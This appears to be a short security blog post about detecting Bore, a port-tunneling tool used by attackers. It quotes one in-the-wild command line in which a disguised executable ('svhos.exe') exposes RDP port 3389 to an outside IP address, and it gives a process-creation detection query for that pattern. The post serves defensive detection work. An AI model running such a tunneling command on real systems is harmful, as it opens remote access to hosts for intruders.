066. Detecting Bore - Another Tunneling Tool in Adversary's Kit

Hello everyone! Tunneling tools - they are everywhere! Today we'll look at another example observed in-the-wild - Bore. 


It's a CLI tool that exposes local ports to a remote server. Want an example? Sure, here you go:

"%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238

Third-rate masquarading, right? I think you noticed interesting command line parameters we can use for building detections. Here's an example:

event_type: "processcreate" 

AND 

cmdline.keyword: /.* local .*/ 

AND 

cmdline: (("3389" OR "22") AND "to")

Of course, you can experiment with port numbers and exclusions!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

001. The Zeltser Challenge

012. They Want to Know Everything About Your System!